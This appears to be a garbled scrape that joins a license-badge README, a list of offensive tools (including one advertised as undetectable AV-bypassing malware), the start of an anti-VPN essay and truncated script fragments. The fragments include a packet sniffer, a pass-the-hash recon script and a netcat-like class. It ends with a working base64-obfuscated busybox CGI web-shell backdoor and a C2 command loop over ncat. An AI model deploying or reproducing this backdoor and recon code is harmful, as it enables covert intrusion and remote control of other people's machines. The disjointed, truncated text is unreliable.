0x08 its0x08

Markdown License badges

Collection of License badges for your Project's README file.
This list includes the most common open source and open data licenses.
Easily copy and paste the code under the badges into your Markdown files.

Notes

The badges do not fully replace the license informations for your projects, they are only emblems for the README, that the user can see the License at first glance.

Translations: (No guarantee that the translations are up-to-date)

🇫🇷 Cette liste en français

Tools

Metaspoit: Penetration testing software
GhostShell: Malware indetectable, with AV bypass techniques, anti-disassembly, etc.
BeEF: The Browser Exploitation Framework
PTF: Penetration Testers Framework
Bettercap: MITM framework
Nessus: Vulnerability scanner
AutoNessus: Auto Nessus
BDFProxy: Patch Binaries via MITM (BackdoorFactory)

Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.

A Russian translation of this article can be found here, contributed by Timur Demin.
A Turkish translation can be found here, contributed by agyild.
There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.

	#Packet sniffer in python for Linux
	#Sniffs only incoming TCP packet

	import socket, sys
	from struct import *

	#create an INET, STREAMing socket
	try:
	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
	except socket.error , msg:

	#!/bin/bash
	TARGET=$1
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
	pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"

	#!/usr/local/bin/python2.7
	# -- coding: utf-8 --
	#
	# Autor: Silvio Giunge Silva a.k.a Kanazuchi
	# <[email protected]>
	#
	# URL para gerar o token http://www.pinceladasdaweb.com.br/instagram/access-token/
	# Crie um arquivo com o token e user id separados por ; (ponto e virgula)
	# EX: echo '198754745546.5bdsa1e6.70b4234e28749efs80521a4c21314a2sd9b;suasenha' >> instadata
	#

	#!/usr/bin/env python
	# -- coding: utf-8 --

	import socket
	import sys
	import threading


	HOST = socket.gethostname()
	PORT = 6000

	#!/usr/bin/python2.7

	import sys

	def gftp_descrable_password(password):
	"""gftp password descrambler

	This code has been released in the Public Domain by the original author.

	"""

	import socket

	class Netcat:

	""" Python 'netcat like' module """

	def __init__(self, ip, port):

	self.buff = ""
	self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	CGI BASED BACKDOOR WITH BUSYBOX:
	----------------------------------
	mkdir -p /tmp/s/cgi-bin;(base64 -d <<<IyEvYmluL2Jhc2gKaWYgWyAiJFJFUVVFU1RfTUVUSE9EIiA9PSAiSEVBRCIgXSAmJiBbICIkSFRUUF9VU0VSX0FHRU5UIiA9PSAibm9wZSIgXTsgdGhlbgogICAgQz0kKGJhc2U2NCAtZCA8PDwgJFFVRVJZX1NUUklORykKICAgIGlmIFsgIiRDIiA9PSAiZXhpdCIgXTsgdGhlbgogICAgICAgIGVjaG8gIkNsZWFuIgogICAgICAgIHJtIC4vcAogICAgICAgIGtpbGwgJChwZ3JlcCBidXN5Ym94KQogICAgIGZpCiAgICAgZWNobyAkKGJhc2ggLWMgIiRDIikKZmkK)>/tmp/s/cgi-bin/p;chmod +x /tmp/s/cgi-bin/p; busybox httpd -f -p <LPORT> -h /tmp/s/; rm -rf /tmp/s/



	C2:
	---------------------
	COMMAND=''; while [ "$COMMAND" != "exit" ]; do read -p "$ " COMMAND; echo -e "HEAD /cgi-bin/p?$(base64<<<$COMMAND) HTTP/1.0\nHost: \nUser-Agent: nope\n\n" \| ncat <LHOST> <LPORT>; done